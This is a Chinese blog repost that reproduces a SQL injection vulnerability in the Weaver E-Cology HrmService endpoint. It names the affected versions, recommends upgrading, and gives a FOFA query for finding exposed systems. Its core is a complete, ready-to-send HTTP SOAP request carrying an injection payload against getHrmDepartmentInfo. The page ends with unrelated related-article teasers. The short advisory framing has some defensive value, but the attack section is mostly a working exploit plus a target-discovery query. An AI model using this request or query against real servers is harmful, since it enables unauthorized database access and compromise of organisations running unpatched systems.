漏洞复现-泛微-E-Cology-SQL

server/2024/9/24 7:23:23/

更多漏洞分析复现,可前往无问社区查看icon-default.png?t=O83Ahttp://www.wwlib.cn/index.php/artread/artid/10358.html

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

泛微e-cology系统HrmService前台存在SQL注入漏洞。。

影响范围:泛微E-Cology9 < 10.65.0

建议升级最新版本,已经修复

0x03 复现环境

FOFA:app="泛微-协同商务系统"

图片

POC

延时5秒
payload:

POST /services/HrmService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close
SOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 427<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hrm="http://localhost/services/HrmService"><soapenv:Header/><soapenv:Body><hrm:getHrmDepartmentInfo><!--type: string--><hrm:in0>gero et</hrm:in0><!--type: string--><hrm:in1>1)AND(db_name()like'ec%'</hrm:in1></hrm:getHrmDepartmentInfo></soapenv:Body>
</soapenv:Envelope>

http://www.ppmy.cn/server/117588.html

相关文章

Android Studio 安装2022版稳定版 2022.3.1 详细操作(带图展示)

Android Studio 安装2022版稳定版 2022.3.1 详细操作(带图展示)

一、先规范好文件地址 分别创建文件夹Android_SDK和AndroidStudio用来放置SDK与软件 特别注意&#xff1a;文件夹不要出现空格与中文&#xff0c;且文件夹都为空 二、下载android studio &#xff08;1&#xff09;点开下载网页 https://developer.android.google.cn/studi…
阅读更多...
Vue Router push方法的使用

Vue Router push方法的使用

Vue Router push方法的使用 this.$router.push 是 Vue Router 提供的一个方法,用于在 Vue.js 应用中进行编程式导航。它的作用是将用户导航到应用中的不同路由。 基本作用 this.$router.push 方法会在浏览器历史记录中添加一个新的记录,并导航到指定的路由。它的工作方式类…
阅读更多...
个人随想-向量数据库,你到底应该选择谁?

个人随想-向量数据库,你到底应该选择谁?

随着大模型的新起&#xff0c;vectorstore这1、2年也非常的火。从以前只能用chroma到现在几十种向量数据库&#xff0c;选都选不过来。 以我接触过的很多公司来说&#xff0c;他们去选择向量数据库的时候&#xff0c;很多都和迷茫&#xff0c;不知道应该选择哪个向量数据库&am…
阅读更多...
VTD激光雷达(1)——01_OptiX_RayTracing-笔记

VTD激光雷达(1)——01_OptiX_RayTracing-笔记

文章目录 前言一、文档介绍1、 总结 前言 不想学习怎么办 感谢VTD官方视频指导 一、文档介绍 1、 1 2 站在光的角度上考虑问题&#xff0c;如果用光源发出的&#xff0c;好多没到传感器上&#xff0c;这样会导致计算量很大&#xff0c;我们用传感器的trace 3 4 5 6 7 8 …
阅读更多...
【AI学习笔记】初学机器学习西瓜书的知识点概要记录

【AI学习笔记】初学机器学习西瓜书的知识点概要记录

初学机器学习西瓜书的知识点概要记录 1.1 机器学习1.2 典型的机器学习过程1.2 机器学习理论1.3 基本术语1.4 归纳偏好1.5 NFL定理2.1 泛化能力2.2 过拟合和欠拟合2.3 三大问题2.4 评估方法2.5 调参与验证集2.6 性能度量2.7 比较检验 以下内容出自周志华老师亲讲西瓜书 1.1 机器…
阅读更多...
在线查看 Android 系统源代码 Android Code Search

在线查看 Android 系统源代码 Android Code Search

在线查看 Android 系统源代码 Android Code Search 1. Android Code Search2. Android2.1. platform/superproject2.2. build/envsetup.sh2.3. build/make/envsetup.sh References 1. Android Code Search https://cs.android.com/ Android https://cs.android.com/android An…
阅读更多...
linux 操作系统下的curl 命令介绍和使用案例

linux 操作系统下的curl 命令介绍和使用案例

linux 操作系统下的curl 命令介绍和使用案例 1. curl 命令简介 curl 是一个利用 URL 规则在命令行下工作的文件传输工具。它支持文件的上传和下载&#xff0c;是综合传输工具&#xff0c;但传输的协议主要是 HTTP/HTTPS 和 FTP。curl 还支持很多种类型的服务器认证方式&#…
阅读更多...
八股文知识汇总(常考)

八股文知识汇总(常考)

八股文知识汇总&#xff08;常考&#xff09; 语言特性相关 JAVA知识 - JDK动态代理为什么只能代理有接口的类&#xff1f; 说一下对象创建的过程&#xff1f;ThreadLocal是什么&#xff1f;他的实现原理是什么&#xff1f;ThreadLocal会出现内存泄露吗&#xff1f;String、…
阅读更多...
最新文章

Copyright @ 2022~2023